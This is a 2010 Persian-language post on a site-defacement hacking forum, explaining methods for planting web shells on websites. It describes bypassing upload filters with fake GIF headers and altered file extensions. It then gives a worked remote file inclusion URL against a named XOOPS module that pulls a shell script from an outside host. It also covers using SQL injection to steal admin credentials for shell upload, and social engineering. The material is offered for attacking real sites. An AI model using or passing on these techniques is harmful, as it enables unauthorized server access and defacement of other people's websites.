Defacer Team
wellcome


# : Islamic Hackerz Team : # :
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 می خوام روش های آپلود کردن

Go down 
AuthorMessage
khashayarnai

avatar

Posts : 40
Join date : 2010-12-23
Age : 33
Location : تهران

PostSubject: می خوام روش های آپلود کردن    Thu Dec 23, 2010 7:54 pm

چندین روش برای به دست آوردن اکسس از سایت ها و سرورها وجود داره که اونارو به ترتیب براتون توضیح می دم!

1- آپلود شل از طریق بایپس ( ByPass ) کردن یا دور زدن آپلود سنتر.
توضیحات :

در این روش شما می تونید با روش ها و ترفندهای مختلفی یک آپلود سنتر رو دور بزنید یا در اصطلاح باپیسش کنید !
مثلا با اضافه کردن کد GIF98;a به اول شل بعضی از آپلود سنتر ها گول می خورن و اجازه آپلود رو به شما می دن !
یک روش دیگه برای دور زدن آپلود سنتر ها وجود داره. اونم عوض کردن پسورد فایل هست !
مثلا عوض کردن پسوند فایل php. به gif.php. ! که ممکنه دوباره آپلود سنتر بایپس بشه !
یا مثلا در یک سایت نوشته شما مجاز به آپلود پسوندهای زیر نیستید :

aspx , .asp , .php , .html , .htm. , ...

خوب حالا شما در اینجور آپلود سنترها به راحتی می تونید شل خودتونو با پسورد php3. آپلود کنید !!!
قابل ذکر هست که بعضی از آپلود سنترها به هیچ وجه پسوندی براشون تعریف نشده و شما می تونید به راحتی و بدون هیچ تغییری در شل کدتون ، شل خودتونو
آپلود کنید !

2- استفاده از باگ های Rfi .
توضیحات :

خوب همون طور که می دونید Rfi به معنی Remote File Inclusion هست !
در این حور باک ها شما می تیند شل اسکریپت خودتونو به راحتی در سرور ران کنید ( بدون هیچ دردسری )
یک مثال براتون می زنم :

http://www.ipsjdps.org/XOOPS/modules/xfsection/modify.php?dir_module=http://mr-parsi.persiangig.com/c100.txt?

خوب همون طور که می بینید بعد از علامت مساوی ( = ) آدرس شلم رو به صورت فایل Txt که قیلا در فضای خودم آپلود کرده بودن بهش دادم ! که آخرش هم
علامت سوال ( ؟ ) گذاشتم. ( دوستان حتما توجه داشته باشن که اگه علامت ? در آخر شل گذاشته نشه ، شل ران نمیشه ! )
البته می تونید فایلتون رو به صورت php. آپلود کنید. ولی بهتره با پسوند txt. باشه تا به صورت مستقیم در سرور ران بشه !

3- استفاده از باگ های Sql !
توضیحات :

خوب شاید بعضی ها که این تیتر رو ببینن می گن این عجب اسکلیه بابا !! هنوز نمی دونه باگ Sql برای به دست آوردن یوزر و پسورد هست فقط !
خوب باید در جواب بگم دوست عزیز یکی دیگه از روش های آپلود می تونه همین باشه !
مثلا شما یوزر و پسورد یک سایتی رو از طریق باگ Sql به دست آوردید !
نکته : بعضی از مدیریت محتواها مثل جملا و ... یک آپلود سنتر در قسمت مدیریت دارند که به وسیله ی اون می تونید شل خودتونو آپلود کنید !
( به همین راحتی )

4- مهندسی اجتماعی !
توضحات :

شما از من بهتر بلدید geek
Back to top Go down
View user profile
Admin
Admin
avatar

Posts : 18
Join date : 2010-08-25
Location : Back Street

PostSubject: Re: می خوام روش های آپلود کردن    Mon Mar 28, 2011 1:49 pm

خیلی خوب بود . ممنون
Back to top Go down
View user profile http://defacer.darkbb.com
 
می خوام روش های آپلود کردن
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Defacer Team :: دیفیس سایت :: سایت هایی با باگ Rfi - Lfi-
Jump to: